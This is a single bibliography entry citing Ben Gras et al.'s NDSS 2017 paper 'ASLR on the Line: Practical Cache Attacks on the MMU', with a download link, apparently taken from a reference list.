[106] Ben Gras et al. “ASLR on the Line: Practical Cache Attacks on the MMU”. In: NDSS. Feb. 2017. url: https://www.vusec.net/download/?t=papers/anc_ndss17.pdf.